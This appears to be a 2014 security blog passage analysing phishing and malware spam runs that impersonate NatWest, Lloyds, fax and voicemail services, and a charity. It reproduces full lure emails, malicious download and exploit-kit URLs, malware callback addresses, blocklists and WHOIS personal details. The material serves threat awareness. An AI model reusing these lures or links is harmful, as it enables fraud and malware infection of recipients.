Let's look at the WHOIS details for the fake domain:

Registrant ID:DI_37927050
Registrant Name:weba
Registrant Organization:greg
Registrant Street: rue marcel de france
Registrant City:la chapelle
Registrant State/Province:St luc
Registrant Postal Code:10600
Registrant Country:FR
Registrant Phone:+33.2356789990
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email:nelsondove1@gmail.com


Not much to go on there, but the scammers are using their own email infrastructure to pump these out from 208.91.199.216 using the domain esecuredmails.eu registered to:

Name: Nelson
Organisation: N/A
Language: English
Address:
bijsterhuizen 1160
2282 pm Rijswijk
Netherlands
Phone: +31.645433356
Email: unit1x1@yahoo.com


Both of these refer to "Nelson". The website advocateforyouths.org actually forwards to a framed page on www-parisline.in (hosted on 103.242.119.69 in India) registered to:

Registrant Name:Patrik Pie
Registrant Organization:N/A
Registrant Street1:14 rue du Theatre
Registrant Street2:
Registrant Street3:
Registrant City:Porte de Versailles
Registrant State/Province:Paris
Registrant Postal Code:75015
Registrant Country:FR
Registrant Phone:+33.0617750470
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:nelsondove1@gmail.com


As before, this site also contains a number of other fake sites, some of which are likely to form part of the same scam. I covered the fake Al-zaida Emirates Group Holding Co and Hotel T Bello before. There may be other scam sites on the same server.

Advocates for Youth is a decent organisation, and apparently these scumbag scammers have no shame whatsoever in using their good name for their own financial gain. Given the relative sophistication of the scammer's set-up, it is likely that they will keep trying with this particular scam.
 Take care.

Friday, 19 September 2014

Microsoft Outlook "You have received a voice mail" spam

This fake voice mail message leads to malware:
From:     Microsoft Outlook [no-reply@victimdomain.com]
Date:     19 September 2014 11:59
Subject:     You have received a voice mail

You received a voice mail : VOICE976-588-6749.wav (25 KB)
Caller-Id: 976-588-6749
Message-Id: D566Y5
Email-Id: conrad@longmore.me.uk

Download and extract to listen the message.

We have uploaded voicemail report on dropbox, please use the following link to download your file:
---
http://www.prolococapena.com/yckzpntfyl/mahlqhltkh.html
---


Sent by Microsoft Exchange Server
The link in the email messages goes to www.prolococapena.com/yckzpntfyl/mahlqhltkh.html first and then downloads a file from www.prolococapena.com/yckzpntfyl/Invoice102740_448129486142_pdf.zip which contains exactly the same malicious executable being pushed in this earlier spam run.

"NatWest Statement" spam.. yet again.

Poor old NatWest is being spoofed again in this spam run that leads to malware..

From:     NatWest.co.uk [noreply@natwest.com]
Date:     19 September 2014 10:40
Subject:     NatWest Statement

 View Your September 2014 Online Financial Activity Statement

Keep track of your account with your latest Online Financial Activity Statement from NatWest Bank. It's available for you to view at this secure site. Just click to select how you would like to view your statement:

View/Download as a PDF

View all EStatements

So check out your statement right away, or at your earliest convenience.

Thank you for managing your account online.

Sincerely,

NatWest Bank

Please do not respond to this e-mail. If you have any questions about this inquiry message or your NatWest Bank ®
Merchant account, please speak to a Customer Service representative at 1-800-374-2639

NatWest Bank Customer Service Department

P.O. Box 414 | 38 Strand, WC2N 5JB, London

Copyright 2014 NatWest Company. All rights reserved.

AGNEUOMS0006001 

In this case, the link in the email goes to www.teli.us/ylojwatayv/hjhgoflpob.html which then downloads a file from the same site at www.teli.us/ylojwatayv/Invoice102740_448129486142_pdf.zip - this in turn unzips to a malicious executable Invoice102740_448129486142_pdf.exe which has a VirusTotal detection rate of 1/55.

Analysis of this binary is still pending.

UPDATE: the Anubis report shows network activity to hallerindia.com on 192.185.97.223. I would suggest that this is a good domain to block.

Thursday, 18 September 2014

"Important - New account invoice" spam leads to malware

This fake NatWest invoice (since when did banks send invoices?) leads to a malicious ZIP file.

From:     NatWest Invoice [invoice@natwest.com]
Date:     18 September 2014 11:06
Subject:     Important - New account invoice

  Your latest NatWest invoice has been uploaded for your review. If you have any questions regarding this invoice, please contact your NatWest service team at the number provided on the invoice for assistance.

To view/download your invoice please click here or follow the link below :

https://www.nwolb.com/ServiceManagement/InvoicePageNoMenu.aspx?InvoiceCode=Invoice_712816

Thank you for choosing NatWest.

Important: Please do not respond to this message. It comes from an unattended mailbox.

This email and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed. If you have received this email in error please notify the system manager. This message contains confidential information and is intended only for the individual named. If you are not the named addressee you should not disseminate, distribute or copy this e-mail. Please notify the sender immediately by e-mail if you have received this e-mail by mistake and delete this e-mail from your system. If you are not the intended recipient you are notified that disclosing, copying, distributing or taking any action in reliance on the contents of this information is strictly prohibited.

The Royal Bank of Scotland International Limited trading as NatWest (NatWest). Registered Office: P.O. Box 64, Royal Bank House, 71 Bath Street, St. Helier, Jersey JE4 8PJ. Regulated by the Jersey Financial Services Commission.

The link in this particular email goes to bnsoutlaws.co.uk/qvgstopmdi/njfeziackv.html which then downloads a ZIP file from bnsoutlaws.co.uk/qvgstopmdi/Account_Document.zip which in turn contains a malicious executable Account_Document.scr which has a VirusTotal detection rate of just 1/53.

The ThreatTrack report [pdf] shows that the malware attempts to call home to:

188.165.204.210/1809uk1/NODE01/0/51-SP3/0/
188.165.204.210/1809uk1/NODE01/1/0/0/
188.165.204.210/1809uk1/NODE01/41/5/4/
liverpoolfc.bg/images/stories/1809uk1.shh


Recommended blocklist:
188.165.204.210
liverpoolfc.bg

UPDATE: bnsoutlaws.co.uk is now cleaned up, so you can un-block it.

UPDATE:
The same malware is also being pushed by a fake Lloyds Bank email..

From:     Lloyds Commercial Bank [secure@lloydsbank.com]
Date:     18 September 2014 11:45
Subject:     Important - Commercial Documents

Important account documents

Reference: C146
Case number: 68819453
Please review BACs documents.

Click link below, download and open document. (PDF Adobe file)
----------------------
http://fleabuster.com/dkklteqsrx/wlodznqmfc.html
-----------------------

Please note that the Terms and Conditions available below are the Bank's most recently issued versions. Please bear in mind that earlier versions of these Terms and Conditions may apply to your products, depending on when you signed up to the relevant product or when you were last advised of any changes to your Terms and Conditions. If you have any questions regarding which version of the Terms and Conditions apply to your products, please contact your Relationship Manager. .

Yours faithfully

James Vance
Senior Manager, Lloyds Commercial Banking

Calls may be monitored or recorded in case we need to check we have carried out your instructions correctly and to help improve our quality of service.

Please remember we guarantee the security of messages sent by email. 

Wednesday, 17 September 2014

The Furniture Market "TFM Confirmation - Order R12003585" spam

This fake order confirmation is not from The Furniture Market (thefurnituremarket.co.uk). It has a malicious PDF file attached to it that you should not open. The Furniture Market's computer systems have not been compromised.

From:     Marc - The Furniture Market [marc@thefurnituremarket.co.uk]
Date:     17 September 2014 15:40
Subject:     TFM Confirmation - Order R12003585

Good afternoon,

  Thank you for your order.  Please find attached to this mail, confirmation of the products ordered and collected from us earlier today.

  Should you have any further queries, then please do not hesitate to contact us.

Kind Regards,

Marc Chadwick

The Furniture Market
( Tel: 01829 759 259
* Email:marc@thefurnituremarket.co.uk
: web: www.thefurnituremarket.co.uk 

VAT No. 904103182  │ Company No. 6491540

  new-signiture (2)

Please consider the environment before printing this e-mail

find us on facebooktwitter-logo-follow1 trustpilot-coolpriser

It is trivially easy to fake who an email message is "From", and this email looks very convincing which makes me suspect that the bad guys have based it on a real message, possibly harvested from a hacked computer.

The attachment is IR12003585-001.pdf which is a malicious PDF file with a VirusTotal detection rate of 10/54. The VT report indicates that it is using vulnerability CVE-2013-2729 to execute malicious code. If you are using an up-to-date version of Acrobat Reader (or an alternative PDF reader) then there is a good chance that you will be OK.

The Furniture Market gets considerable kudos in my book for being very on the ball and having a great big warning notice on their site. Hopefully they are just as efficient when it comes to delivering furniture!


"You've received a new fax". No you haven't, you've received a new bit of malware.

This tired old spam format comes with warmed-over malware attachment.
From:     Fax [fax@victimdomain.com]
Date:     17 September 2014 09:32
Subject:     You've received a new fax

New fax at SCAN6405035 from EPSON by https://victimdomain.com
Scan date: Wed, 17 Sep 2014 16:32:29 +0800
Number of pages: 2
Resolution: 400x400 DPI

You can secure download your fax message at:

http://estudiocarraro.com.br/hpmdkvpvge/hljaejzkql.html

(Google Disk Drive is a file hosting service operated by Google, Inc.)
The link in the email downloads an archive file Message_Document_pdf.zip from the same estudiocarraro.com.br site. This has a VirusTotal detection rate of 3/54. The ThreatTrack report shows that the malware attempts to phone home to:

denis-benker.de/teilen/1709uk1.hit
188.165.204.210/1709uk1/NODE01/0/51-SP3/0/
188.165.204.210/1709uk1/NODE01/1/0/0/
188.165.204.210/1709uk1/NODE01/41/5/4/

Recommended blocklist:
188.165.204.210
denis-benker.de
estudiocarraro.com.br


Tuesday, 16 September 2014

WARNING: "Grant Funding USA" (grantfundingusa.org)

If you are tempted by the offer of a course from an organisation called Grant Funding USA with a website grantfundingusa.org then read this first.

Grant Funding USA is run by Anthony Christoper Jones and Patchree Patchrint (aka Patty Patchrint or Patty Jones). Previous ventures by this pair include the North American Program Planning and Policy Academy (NAPPPA), Institute of Project Management America (IPMA) (aka DDGLA American Project Management LLC), the Institute for Communication Improvement, LLC, The Grant Institute, and the LA restaurants Mother Road, the Royale on Wilshire and Mode.

Their website makes all sorts of claims, including this one on their "About Us" page:
Established in 2004, Grant Funding USA is a network of independent consultants, nonprofit professionals, and fund raising executives dedicated to sharing their knowledge and expertise in the field of grantsmanship and program development. Our program instructors have over ten years of real world experience in the nonprofit and for profit arena which allows them to effortlessly weave theory and practice into a results oriented program for all participants. The goal of our program is to equip our graduates with the skills and tools they need to succeed in the competitive world of fund raising.
The website was created in March 2014, and certainly this network (of two people, basically) has not been in operation under this name for that long, although there have been warnings about its predecessor called "The Grant Institute" for several years.

Before dealing with this company, I urge you to do your own research on the companies that they have run before.

"Unpaid invoice notification" spam leads to Angler Exploit Kit

This convincing-looking but fake spam leads to an exploit kit.

From:     Christie Foley [christie.foley@badinsky.sk]
Reply-to:     Christie Foley [christie.foley@badinsky.sk]
Date:     16 September 2014 13:55
Subject:     Unpaid invoice notification

We are writing to you about fact, despite previous reminders, there remains an outstanding amount of GBP 278.59 in respect of the invoice(s) contained in current letter . This was due for payment on 26 August, 2014.
    Our credit terms stipulate full payment within 3 days and this amount is now more than 14 days overdue.The total amount due from you is therefore GBP 308.43

    If the full amount of the sum outstanding, as set above, is not paid within 7 days of the date of this email, we shall have to begin legal action, without warning, for a court order requiring payment. We may also commence insolvency proceedings. Legal proceedings can take effect on any credit rating. The costs of legal proceedings and any other amounts which the court orders must also be paid in addition to the debt.

    This email is being sent to you according to the Practice Direction on Pre-Action Conduct (the PDPAC) contained in the Civil Procedure Rules, The court has the power to sanction your continuing decline to respond.

To view the the original invoice please follow link

  We immediate answer to this email.

Sincerely, Christie Foley.

The security and confidentiality of your personal information is important for us. If you have any questions, please either call the toll-free customer service phone number.
© 2014, All rights reserved

The link in the email goes to:
[donotclick]tiragreene.com/aspnet_client/system_web/4_0_30319/invoice_unn.html

Which in turn goes to an Angler EK landing page at:
[donotclick]108.174.58.239:8080/wn8omxftff

You can see the URLquery report for the EK here. I would strongly recommend blocking web traffic to 108.174.58.239 (ColoCrossing, US).

UPDATE 2014-09-17:

A second round of these is doing the rounds, leading to an exploit kit on [donotclick]109.232.105.106:8080/xolbnl9ehz (report) so I also recommend blocking 109.232.105.106 (Thyphone Communications, Russia)

The content of the email is essentially the same, but the subject and sender vary. Here are some examples:

[IMPORTANT] Invoice overdue notification
[IMPORTANT] Unpaid invoice notification
Last letter before commencing legal action
[IMPORTANT] Invoice overdue

[IMPORTANT] Recent invoice unpaid

Carmelo Erickson
Rosie Robertson
Tabitha Patterson
Phil Bates

Luisa Maso



"Kifilwe Shakong" "Copied invoices" spam

Kifilwe Shakong is a real person who works for Cashbuild in South Africa. She is  not the person sending these messages, they are forgeries. Cashbuild's systems have not been compromised in any way. As you might guess, these messages have a malicious attachment.

From:     Kifilwe Shakong [kshakong@cashbuild.co.za]
Date:     16 September 2014 12:17
Subject:     Copied invoices

The attached invoices are copies. We will not be able to pay them. Please send clear invoices
______________________________________________________________________
This outbound email has been scanned by the IS Mail Control service.
For more information please visit http://www.is.co.za
______________________________________________________________________

The attached invoices are copies. We will not be able to pay them. Please send clear invoices
______________________________________________________________________
This outbound email has been scanned by the IS Mail Control service.
For more information please visit http://www.is.co.za
Attached is a file with a filename in the format SKMBT_75114091015230.zip which in turn contains a malicious executable SKMBT_75114091015230.exe which has a very low detection rate at VirusTotal of just 1/54.

The ThreatTrack report [pdf] shows that the malware attempts to phone home to the following domains and IPs which are worth blocking:
golklopro.com
94.100.95.109
31.134.29.175
176.213.10.114
176.8.72.4
176.99.191.49
78.56.92.46
195.114.159.232
46.98.234.76
46.185.88.110
46.98.122.183
46.211.198.56
195.225.147.101
176.53.209.231

The payload seems to be very similar to this spam run yesterday.


UPDATE: The ThreatExpert report also indicates that the malware downloads components from the following locations:

musicacademymadras.in/333
ethostraining.es/333.cab
acfnet.com.br/333.jpg
vistabuys.com/333.exe

The malware attempts to phone home to cosjesgame.su as well as golklopro.com.

The ThreatTrack report [pdf] for the second component shows the malware attempting to POST to
37.59.136.101 (OVH, France alloced to "Varts Hosting GB") and 184.106.64.151 (Rackspace, US).

Recommended blocklist:
golklopro.com
cosjesgame.su
musicacademymadras.in
ethostraining.es
acfnet.com.br
vistabuys.com
31.134.29.175
37.59.136.101
46.98.234.76
46.98.122.183
46.119.126.141
46.185.88.110
46.211.198.56
77.121.236.75
78.56.92.46
85.237.34.129
91.221.29.181
93.78.145.22
93.183.242.24
94.100.95.109
107.23.255.195
109.165.101.8
176.8.72.4
176.53.209.231
176.99.191.49
176.193.54.38
176.213.10.114
178.74.216.27
178.137.18.149
184.106.64.151
195.114.159.232
195.138.84.68
195.225.147.101